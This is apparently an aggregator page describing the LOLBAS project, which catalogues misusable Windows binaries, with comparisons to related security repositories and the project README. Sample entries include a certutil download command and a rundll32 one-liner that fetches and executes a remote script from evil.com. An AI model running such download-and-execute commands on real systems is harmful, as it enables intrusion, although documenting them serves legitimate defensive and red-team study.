Convert Figma logo to code with AI

LOLBAS-Project logoLOLBAS

Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

6,900
971
6,900
43

Top Related Projects

Small and highly portable detection tests based on MITRE's ATT&CK.

This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Quick Overview

LOLBAS (Living Off The Land Binaries and Scripts) is a community-driven project that documents and catalogs Windows binaries, scripts, and libraries that can be used for alternative purposes, often by attackers or red teams. It serves as a comprehensive resource for both offensive and defensive security professionals to understand potential misuse of legitimate Windows tools.

Pros

  • Extensive collection of Windows binaries and scripts with detailed information
  • Regularly updated by the community, ensuring relevance and accuracy
  • Valuable resource for both red team operations and blue team defense strategies
  • Well-organized and easily searchable database

Cons

  • Could potentially be misused by malicious actors
  • Focuses primarily on Windows systems, limiting its applicability to other operating systems
  • Requires constant maintenance to keep up with new Windows updates and tools
  • May not cover all possible misuse scenarios for each binary or script

Getting Started

To use the LOLBAS project:

  1. Visit the LOLBAS website
  2. Use the search function to find specific binaries, scripts, or techniques
  3. Browse categories like Binaries, Scripts, or Libraries
  4. Review detailed information for each entry, including:
    • File path
    • Description
    • Commands
    • Mitigations
    • References

For contributors:

  1. Fork the LOLBAS GitHub repository
  2. Create a new branch for your changes
  3. Add or modify YAML files in the appropriate directories
  4. Submit a pull request with your changes

Note: This is not a code library, so there are no code examples or installation instructions. The project is primarily a knowledge base and reference for security professionals.

Competitor Comparisons

Small and highly portable detection tests based on MITRE's ATT&CK.

Pros of Atomic Red Team

  • Broader scope, covering various attack techniques across different platforms
  • Provides executable tests for validating security controls
  • Regularly updated with new techniques and community contributions

Cons of Atomic Red Team

  • More complex to implement and execute tests
  • Requires more resources and setup time
  • May trigger false positives in security tools during testing

Code Comparison

LOLBAS example (PowerShell):

Certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Atomic Red Team example (YAML):

- name: Download Files with Certutil
  auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
  description: |
    Uses certutil.exe to download a file
  supported_platforms:
    - windows
  executor:
    command: |
      certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml test.yaml
    name: command_prompt

The LOLBAS project focuses on documenting individual Living Off the Land binaries and scripts, while Atomic Red Team provides a comprehensive framework for testing various attack techniques, including those that use LOLBins. Atomic Red Team offers more detailed test cases and execution guidance, but requires more setup and resources. LOLBAS is simpler to reference but lacks the executable tests provided by Atomic Red Team.

This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.

Pros of Red-Teaming-Toolkit

  • Broader scope covering various red teaming techniques and tools
  • Includes resources for different stages of penetration testing
  • Regularly updated with new tools and techniques

Cons of Red-Teaming-Toolkit

  • Less focused on specific Living Off the Land techniques
  • May require more expertise to navigate and utilize effectively
  • Not as well-organized or categorized as LOLBAS

Code Comparison

LOLBAS example (YML format):

- Name: Certutil.exe
  Description: Windows binary used for handling certificates
  Author: 'Oddvar Moe'
  Created: 2018-05-25
  Commands:
    - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
      Description: Download and save 7zip to disk
      Usecase: Download file from Internet
      Category: Download
      Privileges: User
      MitreID: T1105
      MitreLink: https://attack.mitre.org/wiki/Technique/T1105
      OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Red-Teaming-Toolkit doesn't provide specific code examples but rather links to various tools and resources.

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Pros of PayloadsAllTheThings

  • Broader scope covering various attack techniques and payloads
  • More frequently updated with contributions from a larger community
  • Includes detailed explanations and examples for each technique

Cons of PayloadsAllTheThings

  • Less focused on Windows-specific binaries and scripts
  • May require more filtering to find relevant information for specific use cases
  • Lacks a standardized format for each entry, making it harder to parse programmatically

Code Comparison

LOLBAS:

- Name: Rundll32.exe
  Description: Used to execute JavaScript, VBScript, and other code
  Commands:
    - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://evil.com/malicious.sct")"
      Description: Executes JavaScript code from a remote script

PayloadsAllTheThings:

# Rundll32 execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://evil.com/malicious.sct")"
rundll32.exe shell32.dll,Control_RunDLL payload.dll

Both repositories provide valuable information for security professionals, with LOLBAS focusing specifically on Windows binaries and scripts, while PayloadsAllTheThings offers a wider range of attack techniques and payloads across various platforms. The choice between them depends on the specific needs of the user and the target environment.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Living Off The Land Binaries and Scripts (and now also Libraries)

All the different files can be found behind a fancy frontend here: https://lolbas-project.github.io (thanks @ConsciousHacker for this bit of eyecandy and the team over at https://gtfobins.github.io/). This repo serves as a place where we maintain the YML files that are used by the fancy frontend.

Goal

The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.

Criteria

A LOLBin/Lib/Script must:

  • Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
  • Have extra "unexpected" functionality. It is not interesting to document intended use cases.
    • Exceptions are application whitelisting bypasses
  • Have functionality that would be useful to an APT or red team

Interesting functionality can include:

  • Executing code
    • Arbitrary code execution
    • Pass-through execution of other programs (unsigned) or scripts (via a LOLBin)
  • Compiling code
  • File operations
    • Downloading
    • Upload
    • Copy
  • Persistence
    • Pass-through persistence utilizing existing LOLBin
    • Persistence (e.g. hide data in ADS, execute at logon)
  • UAC bypass
  • Credential theft
  • Dumping process memory
  • Surveillance (e.g. keylogger, network trace)
  • Log evasion/modification
  • DLL side-loading/hijacking without being relocated elsewhere in the filesystem.

We do not approve binaries that allows for netntlm coercing, since most Windows binaries allows for that. Only exception is binaries that allows that on other than default ports (such as rpcping) or can allow direct credential theft.

Contributing

If you have found a new LOLBin or LOLScript that you would like to contribute, please review the contributing guidelines located here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/CONTRIBUTING.md

A template for the required format has been provided here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml

The History of the LOLBin

The phrase "Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) at DerbyCon 3.

The term LOLBins came from a Twitter discussion on what to call binaries that can be used by an attacker to perform actions beyond their original purpose. Philip Goh (@MathCasualty) proposed LOLBins. A highly scientific internet poll ensued, and after a general consensus (69%) was reached, the name was made official. Jimmy (@bohops) followed up with LOLScripts. No poll was taken.

Common hashtags for these files are:

  • #LOLBin
  • #LOLBins
  • #LOLScript
  • #LOLScripts
  • #LOLLib
  • #LOLLibs

Our primary maintainer (@oddvarmoe) of this project did a talk at DerbyCon 2018 called: #Lolbins Nothing to LOL about! - https://www.youtube.com/watch?v=NiYTdmZ8GR4 This talk goes over the history of this project.

Maintainers

The following folks help maintain the LOLBAS Project on their personal time:

Thanks

As with many open-source projects, this one is the product of a community and we would like to thank ours:

  • The domain http://lolbins.com has been registered by an unknown individual and redirected it to the old version of this project.
  • The domain http://lolbas-project.com has been registered by Jimmy (@bohops).
  • The logos for the project were created by Adam Nadrowski (@_sup_mane). We #@&!!@#! love them.

Notice

  • Please refer to NOTICE.md for license information